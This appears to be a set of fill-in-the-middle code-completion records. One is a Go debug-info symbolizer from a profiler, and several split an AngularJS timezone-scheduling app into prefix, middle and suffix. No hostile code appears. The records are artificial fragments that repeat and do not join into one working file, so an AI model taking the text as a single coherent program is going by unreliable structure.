level.Debug(s.logger).Log("msg", "no locations to symbolize", "build_id", m.BuildId, "pc_range_start", fmt.Sprintf("0x%x", pcRange[0]), "pc_range_end", fmt.Sprintf("0x%x", pcRange[1]))
return make([][]profile.LocationLine, len(locations)), nil, nil
}
liner, found := s.linerCache[key]
if !found {
switch dbginfo.Source {
case debuginfopb.Debuginfo_SOURCE_UPLOAD:
if dbginfo.Upload.State != debuginfopb.DebuginfoUpload_STATE_UPLOADED {
return nil, nil, debuginfo.ErrNotUploadedYet
}
case debuginfopb.Debuginfo_SOURCE_DEBUGINFOD:
// Nothing to do here, just covering all cases.
default:
return nil, nil, debuginfo.ErrUnknownDebuginfoSource
}
// Fetch the debug info for the build ID.
rc, err := s.debuginfo.FetchDebuginfo(ctx, dbginfo)
if err != nil {
return nil, nil, fmt.Errorf("fetch debuginfo (BuildID: %q): %w", m.BuildId, err)
}
defer func() {
if err := rc.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo reader", "err", err)
}
}()
f, err := os.CreateTemp(s.tmpDir, "parca-symbolizer-*")
if err != nil {
return nil, nil, fmt.Errorf("create temp file: %w", err)
}
defer func() {
if err := f.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo file", "err", err)
}
if err := os.Remove(f.Name()); err != nil {
level.Error(s.logger).Log("msg", "failed to remove debuginfo file", "err", err)
}
}()
_, err = io.Copy(f, rc)
if err != nil {
return nil, nil, fmt.Errorf("copy debuginfo to temp file: %w", err)
}
e, err := elf.Open(f.Name())
if err != nil {
if merr := s.metadata.SetQuality(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED, &debuginfopb.DebuginfoQuality{
NotValidElf: true,
}); merr != nil {
level.Error(s.logger).Log("msg", "failed to set metadata quality", "err", merr)
}
return nil, nil, fmt.Errorf("open temp file as ELF: %w", err)
}
defer func() {
if err := e.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo file", "err", err)
}
}()
if dbginfo.Quality == nil {
dbginfo.Quality = &debuginfopb.DebuginfoQuality{
HasDwarf: elfutils.HasDWARF(e),
HasGoPclntab: elfutils.HasGoPclntab(e),
HasSymtab: elfutils.HasSymtab(e),
HasDynsym: elfutils.HasDynsym(e),
}
if err := s.metadata.SetQuality(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED, dbginfo.Quality); err != nil {
return nil, nil, fmt.Errorf("set quality: %w", err)
}
if !dbginfo.Quality.HasDwarf && !dbginfo.Quality.HasGoPclntab && !(dbginfo.Quality.HasSymtab || dbginfo.Quality.HasDynsym) {
return nil, nil, fmt.Errorf("check debuginfo quality: %w", ErrNoDebuginfo)
}
}
liner, err = s.newLiner(f.Name(), e, dbginfo.Quality)
if err != nil {
return nil, nil, fmt.Errorf("new liner: %w", err)
}
}
pcRange, found := s.pcRanges[key]
if !found {
pcRange, err = liner.PCRange()
if err != nil {
return nil, liner, fmt.Errorf("get pc range: %w", err)
}
s.pcRanges[key] = pcRange
}
countLocationsToSymbolize = s.countLocationsToSymbolize(key, locations)
if countLocationsToSymbolize == 0 {
level.Debug(s.logger).Log("msg", "no locations to symbolize", "build_id", m.BuildId, "pc_range_start", fmt.Sprintf("0x%x", pcRange[0]), "pc_range_end", fmt.Sprintf("0x%x", pcRange[1]))
return make([][]profile.LocationLine, len(locations)), liner, nil
}
level.Debug(s.logger).Log("msg", "symbolizing locations", "build_id", m.BuildId, "count", countLocationsToSymbolize)
locationsLines := make([][]profile.LocationLine, len(locations))
for i, loc := range locations {
		// Check if we already attempted to symbolize this location and failed.
// No need to try again.
if _, failedBefore := s.symbolizationFailed[dbginfo.BuildId][loc.Address]; failedBefore {
continue
}
if pcRange[0] <= loc.Address && loc.Address <= pcRange[1] {
locationsLines[i] = s.pcToLines(liner, key, loc.Address)
}
}
return locationsLines, liner, nil
}
func (s *Symbolizer) countLocationsToSymbolize(key string, locations []*pb.Location) int {
locationsToSymbolize := 0
for _, loc := range locations {
if _, failedBefore := s.symbolizationFailed[key][loc.Address]; failedBefore {
continue
}
pcRange, found := s.pcRanges[key]
if !found {
locationsToSymbolize++
continue
}
if pcRange[0] <= loc.Address && loc.Address <= pcRange[1] {
locationsToSymbolize++
}
}
return locationsToSymbolize
}
// newLiner creates a new liner for the given mapping and object file path.
func (s *Symbolizer) newLiner(filepath string, f *elf.File, quality *debuginfopb.DebuginfoQuality) (liner, error) {
switch {
case quality.HasDwarf:
lnr, err := addr2line.DWARF(s.logger, filepath, f, s.demangler)
if err != nil {
return nil, fmt.Errorf("failed to create DWARF liner: %w", err)
}
return lnr, nil
case quality.HasGoPclntab:
lnr, err := addr2line.Go(s.logger, filepath, f)
if err != nil {
return nil, fmt.Errorf("failed to create Go liner: %w", err)
}
return lnr, nil
// TODO CHECK plt
case quality.HasSymtab || quality.HasDynsym:
lnr, err := addr2line.Symbols(s.logger, filepath, f, s.demangler)
if err != nil {
return nil, fmt.Errorf("failed to create Symtab liner: %w", err)
}
return lnr, nil
default:
return nil, ErrLinerFailed
}
}
// pcToLines returns the source lines for the given PC while keeping track of symbolization attempts and failures.
func (s *Symbolizer) pcToLines(liner liner, key string, addr uint64) []profile.LocationLine {
lines, err := liner.PCToLines(addr)
level.Debug(s.logger).Log("msg", "symbolized location", "build_id", key, "address", addr, "lines_count", len(lines), "err", err, "liner_type", fmt.Sprintf("%T", liner))
if err != nil {
// Error bookkeeping.
if prev, ok := s.symbolizationAttempts[key][addr]; ok {
prev++
if prev >= s.attemptThreshold {
if _, ok := s.symbolizationFailed[key]; ok {
s.symbolizationFailed[key][addr] = struct{}{}
} else {
s.symbolizationFailed[key] = map[uint64]struct{}{addr: {}}
}
delete(s.symbolizationAttempts[key], addr)
} else {
s.symbolizationAttempts[key][addr] = prev
}
return nil
}
// First failed attempt.
s.symbolizationAttempts[key] = map[uint64]int{addr: 1}
return nil
}
if len(lines) == 0 {
if _, ok := s.symbolizationFailed[key]; ok {
s.symbolizationFailed[key][addr] = struct{}{}
} else {
s.symbolizationFailed[key] = map[uint64]struct{}{addr: {}}
}
delete(s.symbolizationAttempts[key], addr)
}
return lines
}
| {
return func(s *Symbolizer) {
s.attemptThreshold = t
}
} | identifier_body |
app.js | 'use strict';
/* global moment */
var timesched = angular
.module('timesched', ['ui.bootstrap', 'ui.sortable', 'ui.slider'])
.config(function($locationProvider) {
$locationProvider.html5Mode(true);
});
(function() {
var SELECTABLES = [];
var SELECTABLES_BY_NAME = {};
var SELECTABLES_BY_KEY = {};
function normalizeZoneName(zoneName) {
return zoneName.toLowerCase().replace(/^\s+|\s+$/g, '');
}
function zoneExists(input) {
return !!SELECTABLES_BY_NAME[normalizeZoneName(input)];
}
function lookupTimeZoneState(input) {
var zone = SELECTABLES_BY_NAME[normalizeZoneName(input)];
if (!zone) {
zone = SELECTABLES_BY_KEY[input];
if (!zone)
return null;
}
    var m = null;
try {
m = moment.tz(normalizeZoneName(zone.z));
} catch (e) {
}
return m !== null ? new TimeZoneState(m, zone) : null;
}
timesched.setTimezoneData = function(data) {
SELECTABLES = [];
SELECTABLES_BY_NAME = {};
SELECTABLES_BY_KEY = {};
for (var i = 0; i < data.selectables.length; i++) {
var sel = data.selectables[i];
SELECTABLES.push(sel);
SELECTABLES_BY_NAME[sel.d.toLowerCase()] = sel;
SELECTABLES_BY_KEY[sel.k] = sel; | }
};
function TimeZoneState(m, zone) {
this.tz = m.tz();
this.urlKey = zone.k;
this.offset = 0;
this.timezoneShortName = zone.n;
this.timezoneName = zone.d;
this.update();
}
TimeZoneState.prototype.update = function(day, homeZone) {
var reftz = homeZone ? homeZone.tz : this.tz;
var start = moment.tz(day, reftz).startOf('day');
var ptr = start.clone().tz(this.tz);
var offset = (start.zone() - ptr.zone()) / 60;
this.dayStart = ptr.clone();
this.homeOffset = (offset > 0 ? '+' : '') + offset;
this.timezoneOffsetInfo = ptr.format('[UTC] Z');
this.utcOffset = ptr.zone();
this.timezoneAbbr = ptr.format('z');
this.isHome = homeZone && homeZone.tz === this.tz;
this.timeCells = [];
for (var i = 0; i < 24; i++) {
if (i !== 0)
ptr.add('hours', 1);
this.timeCells.push({
hour: parseInt(ptr.format('H'), 10),
hourFormat: ptr.format('H'),
minute: parseInt(ptr.format('m'), 10),
minuteFormat: ptr.format('mm'),
tooltip: ptr.format('LLLL (z)')
});
}
if (ptr.zone() !== this.utcOffset) {
var endAbbr = ptr.format('z');
var endOffsetInfo = ptr.format('[UTC] Z');
if (endAbbr != this.timezoneAbbr)
this.timezoneAbbr += '/' + endAbbr;
if (endOffsetInfo != this.timezoneOffsetInfo)
this.timezoneOffsetInfo += '/' + endOffsetInfo;
}
this.updateClock();
};
TimeZoneState.prototype.updateClock = function() {
var now = moment.tz(this.tz);
var oldH = this.clockHour;
var oldM = this.clockMinute;
this.clockHour = now.format('H');
this.clockMinute = now.format('mm');
return this.clockHour !== oldH || this.clockMinute !== oldM;
};
timesched.controller('TimezoneCtrl', function($scope, $location, datepickerConfig) {
$scope.day = new Date();
$scope.isToday = true;
$scope.zones = [];
$scope.homeZone = null;
$scope.currentZone = null;
$scope.ready = false;
$scope.timeRange = [40, 68];
$scope.scheduleMeeting = false;
$scope.meetingSummary = '';
// make the datepicker show monday by default
datepickerConfig.startingDay = 1;
$scope.addInputZone = function() {
if ($scope.addZone($scope.currentZone))
$scope.currentZone = '';
};
$scope.addZone = function(zoneName) {
var zoneState = lookupTimeZoneState(zoneName);
if (zoneState === null)
return false;
$scope.zones.push(zoneState);
$scope.updateZones();
return true;
};
$scope.setAsHome = function(zone) {
$scope.homeZone = zone;
$scope.updateZones();
$scope.saveState();
};
$scope.removeZone = function(zone) {
for (var i = 0, n = $scope.zones.length; i < n; i++) {
if ($scope.zones[i] !== zone)
continue;
$scope.zones.splice(i, 1);
if ($scope.homeZone === zone) {
$scope.homeZone = null;
$scope.updateZones();
}
break;
}
};
$scope.sortByOffset = function() {
$scope.sortByFunc(function(a, b) {
return b.utcOffset - a.utcOffset;
});
};
$scope.sortByName = function() {
$scope.sortByFunc(function(a, b) {
a = a.timezoneName.toLowerCase();
b = b.timezoneName.toLowerCase();
return a == b ? 0 : a < b ? -1 : 1;
});
};
$scope.sortByFunc = function(sortFunc) {
var copy = $scope.zones.slice(0);
copy.sort(sortFunc);
$scope.zones = copy;
};
$scope.updateClocks = function() {
var rv = false;
$scope.zones.forEach(function(zone) {
if (zone.updateClock())
rv = true;
});
var wasToday = $scope.isToday;
$scope.checkForToday();
return rv || (wasToday != $scope.isToday);
};
$scope.checkForToday = function() {
if ($scope.homeZone === null)
return;
var now = moment.tz($scope.homeZone.tz).format('YYYY-MM-DD');
var dayStart = moment.tz($scope.day, $scope.homeZone.tz).format('YYYY-MM-DD');
$scope.isToday = now == dayStart;
};
$scope.updateZones = function() {
if (!$scope.zones.length)
return;
if ($scope.homeZone === null)
$scope.homeZone = $scope.zones[0];
$scope.zones.forEach(function(zone) {
zone.update($scope.day, $scope.homeZone);
});
};
$scope.$watch('day', function() {
$scope.updateZones();
$scope.saveState();
});
$scope.$watch('scheduleMeeting', function() {
$scope.saveState();
});
$scope.$watch('timeRange', function() {
$scope.saveState();
});
$scope.$watchCollection('zones', function() {
$scope.saveState();
});
$scope.saveState = function() {
if (!$scope.ready)
return;
var buf = [];
for (var i = 0; i < $scope.zones.length; i++) {
var zone = $scope.zones[i];
var item = zone.urlKey;
if (zone.isHome)
item += '!';
buf.push(item);
}
var params = {};
params.date = moment($scope.day).format('YYYY-MM-DD');
if (buf.length > 0)
params.tz = buf.join(',');
if ($scope.scheduleMeeting)
params.range = $scope.timeRange[0] + ',' + $scope.timeRange[1];
      if (params.tz != $location.search().tz ||
          params.date != $location.search().date ||
          params.range != $location.search().range)
$location.search(params);
if ($scope.scheduleMeeting)
$scope.updateMeetingSummary();
};
$scope.updateMeetingSummary = function() {
var lines = [];
var fmt = 'HH:mm ddd, MMM D YYYY';
for (var i = 0; i < $scope.zones.length; i++) {
var zone = $scope.zones[i];
var start = zone.dayStart.clone().add('minutes', $scope.timeRange[0] * 15);
var end = zone.dayStart.clone().add('minutes', $scope.timeRange[1] * 15);
if (i > 0)
lines.push('');
lines.push(zone.timezoneName + ' [' + start.format('z; [UTC]ZZ') +
(start.zone() != end.zone() ? '; timezone change' : '') + ']');
lines.push(start.format(fmt));
lines.push(end.format(fmt));
}
$scope.meetingSummary = lines.join('\n');
};
$scope.zonesDifferInURL = function(urlZones) {
if (urlZones.length != $scope.zones.length)
return true;
for (var i = 0; i < urlZones.length; i++) {
if (urlZones[i] !== $scope.zones[i].urlKey)
return true;
}
return false;
};
$scope.syncWithURL = function() {
var allZones = [];
var homeZone = null;
var params = $location.search();
var zones = (params.tz || '').split(',');
var dateChanged = false;
if (zones.length == 1 && zones[0] === '')
zones = [];
for (var i = 0; i < zones.length; i++) {
var zoneName = zones[i];
if (zoneName[zoneName.length - 1] == '!') {
zoneName = zoneName.substr(0, zoneName.length - 1);
homeZone = zoneName;
}
allZones.push(zoneName);
}
if (params.date) {
var newDate = moment(params.date, 'YYYY-MM-DD');
if (!moment(newDate).isSame(moment($scope.day))) {
$scope.day = newDate.toDate();
dateChanged = true;
}
}
if (params.range) {
var rangePieces = params.range.split(',');
$scope.timeRange = [parseInt(rangePieces[0], 10),
parseInt(rangePieces[1], 10)];
$scope.scheduleMeeting = true;
} else {
$scope.scheduleMeeting = false;
}
if (dateChanged || $scope.zonesDifferInURL(allZones)) {
$scope.homeZone = null;
$scope.zones = [];
if (homeZone === null && allZones.length > 0)
homeZone = allZones[0];
if (homeZone !== null)
$scope.addZone(homeZone);
for (i = 0; i < allZones.length; i++) {
if (allZones[i] !== homeZone)
$scope.addZone(allZones[i]);
}
$scope.sortByFunc(function(a, b) {
var idx1 = allZones.indexOf(a.urlKey);
var idx2 = allZones.indexOf(b.urlKey);
return idx1 - idx2;
});
$scope.checkForToday();
}
};
$scope.$on('$locationChangeSuccess', $scope.syncWithURL);
window.setTimeout(function() {
$scope.ready = true;
$scope.syncWithURL();
$('div.loading').hide();
$('div.contentwrapper').fadeIn('slow', function() {
window.setInterval(function() {
if ($scope.updateClocks())
$scope.$apply();
}, 1000);
});
}, 100);
});
timesched.directive('timezone', function() {
return {
restrict: 'ACE',
require: 'ngModel',
scope: {
datasets: '=',
ngModel: '='
},
link: function(scope, elm, attrs, ctrl) {
var localChange = false;
elm.typeahead({
name: 'timezone',
local: SELECTABLES,
valueKey: 'd',
engine: {compile: function() {
return {
render: function(context) {
var time;
try {
time = moment.tz(context.z).format('HH:mm');
} catch (e) {
time = '??:??';
}
return '<p>' + context.d + '\u00a0<em>' + time + '</em></p>';
}
};
}},
template: 'dummy'
});
function updateScope() {
var oldVal = elm.val();
scope.$apply(function() {
localChange = true;
scope.ngModel = elm.val();
});
elm.val(oldVal);
}
elm.on('typeahead:selected', function() {
ctrl.$setValidity('timezone', true);
updateScope();
elm.trigger('submit');
});
elm.on('typeahead:autocompleted', updateScope);
elm.bind('input', function() {
scope.$apply(function() {
var value = elm.val();
if (zoneExists(value)) {
localChange = true;
ctrl.$setValidity('timezone', true);
scope.ngModel = value;
} else {
ctrl.$setValidity('timezone', false);
}
});
});
scope.$watch('ngModel', function(newVal) {
if (localChange) {
localChange = false;
return;
}
elm.typeahead('setQuery', newVal || '');
}, true);
scope.$on('$destroy', function() {
elm.typeahead('destroy');
});
}
};
});
})(); | random_line_split |
|
app.js | 'use strict';
/* global moment */
var timesched = angular
.module('timesched', ['ui.bootstrap', 'ui.sortable', 'ui.slider'])
.config(function($locationProvider) {
$locationProvider.html5Mode(true);
});
(function() {
var SELECTABLES = [];
var SELECTABLES_BY_NAME = {};
var SELECTABLES_BY_KEY = {};
function normalizeZoneName(zoneName) |
function zoneExists(input) {
return !!SELECTABLES_BY_NAME[normalizeZoneName(input)];
}
function lookupTimeZoneState(input) {
var zone = SELECTABLES_BY_NAME[normalizeZoneName(input)];
if (!zone) {
zone = SELECTABLES_BY_KEY[input];
if (!zone)
return null;
}
    var m = null;
try {
m = moment.tz(normalizeZoneName(zone.z));
} catch (e) {
}
return m !== null ? new TimeZoneState(m, zone) : null;
}
timesched.setTimezoneData = function(data) {
SELECTABLES = [];
SELECTABLES_BY_NAME = {};
SELECTABLES_BY_KEY = {};
for (var i = 0; i < data.selectables.length; i++) {
var sel = data.selectables[i];
SELECTABLES.push(sel);
SELECTABLES_BY_NAME[sel.d.toLowerCase()] = sel;
SELECTABLES_BY_KEY[sel.k] = sel;
}
};
function TimeZoneState(m, zone) {
this.tz = m.tz();
this.urlKey = zone.k;
this.offset = 0;
this.timezoneShortName = zone.n;
this.timezoneName = zone.d;
this.update();
}
TimeZoneState.prototype.update = function(day, homeZone) {
var reftz = homeZone ? homeZone.tz : this.tz;
var start = moment.tz(day, reftz).startOf('day');
var ptr = start.clone().tz(this.tz);
var offset = (start.zone() - ptr.zone()) / 60;
this.dayStart = ptr.clone();
this.homeOffset = (offset > 0 ? '+' : '') + offset;
this.timezoneOffsetInfo = ptr.format('[UTC] Z');
this.utcOffset = ptr.zone();
this.timezoneAbbr = ptr.format('z');
this.isHome = homeZone && homeZone.tz === this.tz;
this.timeCells = [];
for (var i = 0; i < 24; i++) {
if (i !== 0)
ptr.add('hours', 1);
this.timeCells.push({
hour: parseInt(ptr.format('H'), 10),
hourFormat: ptr.format('H'),
minute: parseInt(ptr.format('m'), 10),
minuteFormat: ptr.format('mm'),
tooltip: ptr.format('LLLL (z)')
});
}
if (ptr.zone() !== this.utcOffset) {
var endAbbr = ptr.format('z');
var endOffsetInfo = ptr.format('[UTC] Z');
if (endAbbr != this.timezoneAbbr)
this.timezoneAbbr += '/' + endAbbr;
if (endOffsetInfo != this.timezoneOffsetInfo)
this.timezoneOffsetInfo += '/' + endOffsetInfo;
}
this.updateClock();
};
TimeZoneState.prototype.updateClock = function() {
var now = moment.tz(this.tz);
var oldH = this.clockHour;
var oldM = this.clockMinute;
this.clockHour = now.format('H');
this.clockMinute = now.format('mm');
return this.clockHour !== oldH || this.clockMinute !== oldM;
};
timesched.controller('TimezoneCtrl', function($scope, $location, datepickerConfig) {
$scope.day = new Date();
$scope.isToday = true;
$scope.zones = [];
$scope.homeZone = null;
$scope.currentZone = null;
$scope.ready = false;
$scope.timeRange = [40, 68];
$scope.scheduleMeeting = false;
$scope.meetingSummary = '';
// make the datepicker show monday by default
datepickerConfig.startingDay = 1;
$scope.addInputZone = function() {
if ($scope.addZone($scope.currentZone))
$scope.currentZone = '';
};
$scope.addZone = function(zoneName) {
var zoneState = lookupTimeZoneState(zoneName);
if (zoneState === null)
return false;
$scope.zones.push(zoneState);
$scope.updateZones();
return true;
};
$scope.setAsHome = function(zone) {
$scope.homeZone = zone;
$scope.updateZones();
$scope.saveState();
};
$scope.removeZone = function(zone) {
for (var i = 0, n = $scope.zones.length; i < n; i++) {
if ($scope.zones[i] !== zone)
continue;
$scope.zones.splice(i, 1);
if ($scope.homeZone === zone) {
$scope.homeZone = null;
$scope.updateZones();
}
break;
}
};
$scope.sortByOffset = function() {
$scope.sortByFunc(function(a, b) {
return b.utcOffset - a.utcOffset;
});
};
$scope.sortByName = function() {
$scope.sortByFunc(function(a, b) {
a = a.timezoneName.toLowerCase();
b = b.timezoneName.toLowerCase();
return a == b ? 0 : a < b ? -1 : 1;
});
};
$scope.sortByFunc = function(sortFunc) {
var copy = $scope.zones.slice(0);
copy.sort(sortFunc);
$scope.zones = copy;
};
$scope.updateClocks = function() {
var rv = false;
$scope.zones.forEach(function(zone) {
if (zone.updateClock())
rv = true;
});
var wasToday = $scope.isToday;
$scope.checkForToday();
return rv || (wasToday != $scope.isToday);
};
$scope.checkForToday = function() {
if ($scope.homeZone === null)
return;
var now = moment.tz($scope.homeZone.tz).format('YYYY-MM-DD');
var dayStart = moment.tz($scope.day, $scope.homeZone.tz).format('YYYY-MM-DD');
$scope.isToday = now == dayStart;
};
$scope.updateZones = function() {
if (!$scope.zones.length)
return;
if ($scope.homeZone === null)
$scope.homeZone = $scope.zones[0];
$scope.zones.forEach(function(zone) {
zone.update($scope.day, $scope.homeZone);
});
};
$scope.$watch('day', function() {
$scope.updateZones();
$scope.saveState();
});
$scope.$watch('scheduleMeeting', function() {
$scope.saveState();
});
$scope.$watch('timeRange', function() {
$scope.saveState();
});
$scope.$watchCollection('zones', function() {
$scope.saveState();
});
$scope.saveState = function() {
if (!$scope.ready)
return;
var buf = [];
for (var i = 0; i < $scope.zones.length; i++) {
var zone = $scope.zones[i];
var item = zone.urlKey;
if (zone.isHome)
item += '!';
buf.push(item);
}
var params = {};
params.date = moment($scope.day).format('YYYY-MM-DD');
if (buf.length > 0)
params.tz = buf.join(',');
if ($scope.scheduleMeeting)
params.range = $scope.timeRange[0] + ',' + $scope.timeRange[1];
      if (params.tz != $location.search().tz ||
          params.date != $location.search().date ||
          params.range != $location.search().range)
$location.search(params);
if ($scope.scheduleMeeting)
$scope.updateMeetingSummary();
};
$scope.updateMeetingSummary = function() {
var lines = [];
var fmt = 'HH:mm ddd, MMM D YYYY';
for (var i = 0; i < $scope.zones.length; i++) {
var zone = $scope.zones[i];
var start = zone.dayStart.clone().add('minutes', $scope.timeRange[0] * 15);
var end = zone.dayStart.clone().add('minutes', $scope.timeRange[1] * 15);
if (i > 0)
lines.push('');
lines.push(zone.timezoneName + ' [' + start.format('z; [UTC]ZZ') +
(start.zone() != end.zone() ? '; timezone change' : '') + ']');
lines.push(start.format(fmt));
lines.push(end.format(fmt));
}
$scope.meetingSummary = lines.join('\n');
};
$scope.zonesDifferInURL = function(urlZones) {
if (urlZones.length != $scope.zones.length)
return true;
for (var i = 0; i < urlZones.length; i++) {
if (urlZones[i] !== $scope.zones[i].urlKey)
return true;
}
return false;
};
$scope.syncWithURL = function() {
var allZones = [];
var homeZone = null;
var params = $location.search();
var zones = (params.tz || '').split(',');
var dateChanged = false;
if (zones.length == 1 && zones[0] === '')
zones = [];
for (var i = 0; i < zones.length; i++) {
var zoneName = zones[i];
if (zoneName[zoneName.length - 1] == '!') {
zoneName = zoneName.substr(0, zoneName.length - 1);
homeZone = zoneName;
}
allZones.push(zoneName);
}
if (params.date) {
var newDate = moment(params.date, 'YYYY-MM-DD');
if (!moment(newDate).isSame(moment($scope.day))) {
$scope.day = newDate.toDate();
dateChanged = true;
}
}
if (params.range) {
var rangePieces = params.range.split(',');
$scope.timeRange = [parseInt(rangePieces[0], 10),
parseInt(rangePieces[1], 10)];
$scope.scheduleMeeting = true;
} else {
$scope.scheduleMeeting = false;
}
if (dateChanged || $scope.zonesDifferInURL(allZones)) {
$scope.homeZone = null;
$scope.zones = [];
if (homeZone === null && allZones.length > 0)
homeZone = allZones[0];
if (homeZone !== null)
$scope.addZone(homeZone);
for (i = 0; i < allZones.length; i++) {
if (allZones[i] !== homeZone)
$scope.addZone(allZones[i]);
}
$scope.sortByFunc(function(a, b) {
var idx1 = allZones.indexOf(a.urlKey);
var idx2 = allZones.indexOf(b.urlKey);
return idx1 - idx2;
});
$scope.checkForToday();
}
};
$scope.$on('$locationChangeSuccess', $scope.syncWithURL);
window.setTimeout(function() {
$scope.ready = true;
$scope.syncWithURL();
$('div.loading').hide();
$('div.contentwrapper').fadeIn('slow', function() {
window.setInterval(function() {
if ($scope.updateClocks())
$scope.$apply();
}, 1000);
});
}, 100);
});
timesched.directive('timezone', function() {
return {
restrict: 'ACE',
require: 'ngModel',
scope: {
datasets: '=',
ngModel: '='
},
link: function(scope, elm, attrs, ctrl) {
var localChange = false;
elm.typeahead({
name: 'timezone',
local: SELECTABLES,
valueKey: 'd',
engine: {compile: function() {
return {
render: function(context) {
var time;
try {
time = moment.tz(context.z).format('HH:mm');
} catch (e) {
time = '??:??';
}
return '<p>' + context.d + '\u00a0<em>' + time + '</em></p>';
}
};
}},
template: 'dummy'
});
function updateScope() {
var oldVal = elm.val();
scope.$apply(function() {
localChange = true;
scope.ngModel = elm.val();
});
elm.val(oldVal);
}
elm.on('typeahead:selected', function() {
ctrl.$setValidity('timezone', true);
updateScope();
elm.trigger('submit');
});
elm.on('typeahead:autocompleted', updateScope);
elm.bind('input', function() {
scope.$apply(function() {
var value = elm.val();
if (zoneExists(value)) {
localChange = true;
ctrl.$setValidity('timezone', true);
scope.ngModel = value;
} else {
ctrl.$setValidity('timezone', false);
}
});
});
scope.$watch('ngModel', function(newVal) {
if (localChange) {
localChange = false;
return;
}
elm.typeahead('setQuery', newVal || '');
}, true);
scope.$on('$destroy', function() {
elm.typeahead('destroy');
});
}
};
});
})();
| {
return zoneName.toLowerCase().replace(/^\s+|\s+$/g, '');
} | identifier_body |
app.js | 'use strict';
/* global moment */
var timesched = angular
.module('timesched', ['ui.bootstrap', 'ui.sortable', 'ui.slider'])
.config(function($locationProvider) {
$locationProvider.html5Mode(true);
});
(function() {
var SELECTABLES = [];
var SELECTABLES_BY_NAME = {};
var SELECTABLES_BY_KEY = {};
function normalizeZoneName(zoneName) {
return zoneName.toLowerCase().replace(/^\s+|\s+$/g, '');
}
function zoneExists(input) {
return !!SELECTABLES_BY_NAME[normalizeZoneName(input)];
}
function lookupTimeZoneState(input) {
var zone = SELECTABLES_BY_NAME[normalizeZoneName(input)];
if (!zone) {
zone = SELECTABLES_BY_KEY[input];
if (!zone)
return null;
}
    var m = null;
try {
m = moment.tz(normalizeZoneName(zone.z));
} catch (e) {
}
return m !== null ? new TimeZoneState(m, zone) : null;
}
timesched.setTimezoneData = function(data) {
SELECTABLES = [];
SELECTABLES_BY_NAME = {};
SELECTABLES_BY_KEY = {};
for (var i = 0; i < data.selectables.length; i++) {
var sel = data.selectables[i];
SELECTABLES.push(sel);
SELECTABLES_BY_NAME[sel.d.toLowerCase()] = sel;
SELECTABLES_BY_KEY[sel.k] = sel;
}
};
function TimeZoneState(m, zone) {
this.tz = m.tz();
this.urlKey = zone.k;
this.offset = 0;
this.timezoneShortName = zone.n;
this.timezoneName = zone.d;
this.update();
}
TimeZoneState.prototype.update = function(day, homeZone) {
var reftz = homeZone ? homeZone.tz : this.tz;
var start = moment.tz(day, reftz).startOf('day');
var ptr = start.clone().tz(this.tz);
var offset = (start.zone() - ptr.zone()) / 60;
this.dayStart = ptr.clone();
this.homeOffset = (offset > 0 ? '+' : '') + offset;
this.timezoneOffsetInfo = ptr.format('[UTC] Z');
this.utcOffset = ptr.zone();
this.timezoneAbbr = ptr.format('z');
this.isHome = homeZone && homeZone.tz === this.tz;
this.timeCells = [];
for (var i = 0; i < 24; i++) {
if (i !== 0)
ptr.add('hours', 1);
this.timeCells.push({
hour: parseInt(ptr.format('H'), 10),
hourFormat: ptr.format('H'),
minute: parseInt(ptr.format('m'), 10),
minuteFormat: ptr.format('mm'),
tooltip: ptr.format('LLLL (z)')
});
}
if (ptr.zone() !== this.utcOffset) {
var endAbbr = ptr.format('z');
var endOffsetInfo = ptr.format('[UTC] Z');
if (endAbbr != this.timezoneAbbr)
this.timezoneAbbr += '/' + endAbbr;
if (endOffsetInfo != this.timezoneOffsetInfo)
this.timezoneOffsetInfo += '/' + endOffsetInfo;
}
this.updateClock();
};
TimeZoneState.prototype.updateClock = function() {
var now = moment.tz(this.tz);
var oldH = this.clockHour;
var oldM = this.clockMinute;
this.clockHour = now.format('H');
this.clockMinute = now.format('mm');
return this.clockHour !== oldH || this.clockMinute !== oldM;
};
timesched.controller('TimezoneCtrl', function($scope, $location, datepickerConfig) {
$scope.day = new Date();
$scope.isToday = true;
$scope.zones = [];
$scope.homeZone = null;
$scope.currentZone = null;
$scope.ready = false;
$scope.timeRange = [40, 68];
$scope.scheduleMeeting = false;
$scope.meetingSummary = '';
// make the datepicker show monday by default
datepickerConfig.startingDay = 1;
$scope.addInputZone = function() {
if ($scope.addZone($scope.currentZone))
$scope.currentZone = '';
};
$scope.addZone = function(zoneName) {
var zoneState = lookupTimeZoneState(zoneName);
if (zoneState === null)
return false;
$scope.zones.push(zoneState);
$scope.updateZones();
return true;
};
$scope.setAsHome = function(zone) {
$scope.homeZone = zone;
$scope.updateZones();
$scope.saveState();
};
$scope.removeZone = function(zone) {
for (var i = 0, n = $scope.zones.length; i < n; i++) {
if ($scope.zones[i] !== zone)
continue;
$scope.zones.splice(i, 1);
if ($scope.homeZone === zone) {
$scope.homeZone = null;
$scope.updateZones();
}
break;
}
};
$scope.sortByOffset = function() {
$scope.sortByFunc(function(a, b) {
return b.utcOffset - a.utcOffset;
});
};
$scope.sortByName = function() {
$scope.sortByFunc(function(a, b) {
a = a.timezoneName.toLowerCase();
b = b.timezoneName.toLowerCase();
return a == b ? 0 : a < b ? -1 : 1;
});
};
$scope.sortByFunc = function(sortFunc) {
var copy = $scope.zones.slice(0);
copy.sort(sortFunc);
$scope.zones = copy;
};
$scope.updateClocks = function() {
var rv = false;
$scope.zones.forEach(function(zone) {
if (zone.updateClock())
rv = true;
});
var wasToday = $scope.isToday;
$scope.checkForToday();
return rv || (wasToday != $scope.isToday);
};
$scope.checkForToday = function() {
if ($scope.homeZone === null)
return;
var now = moment.tz($scope.homeZone.tz).format('YYYY-MM-DD');
var dayStart = moment.tz($scope.day, $scope.homeZone.tz).format('YYYY-MM-DD');
$scope.isToday = now == dayStart;
};
$scope.updateZones = function() {
if (!$scope.zones.length)
return;
if ($scope.homeZone === null)
$scope.homeZone = $scope.zones[0];
$scope.zones.forEach(function(zone) {
zone.update($scope.day, $scope.homeZone);
});
};
$scope.$watch('day', function() {
$scope.updateZones();
$scope.saveState();
});
$scope.$watch('scheduleMeeting', function() {
$scope.saveState();
});
$scope.$watch('timeRange', function() {
$scope.saveState();
});
$scope.$watchCollection('zones', function() {
$scope.saveState();
});
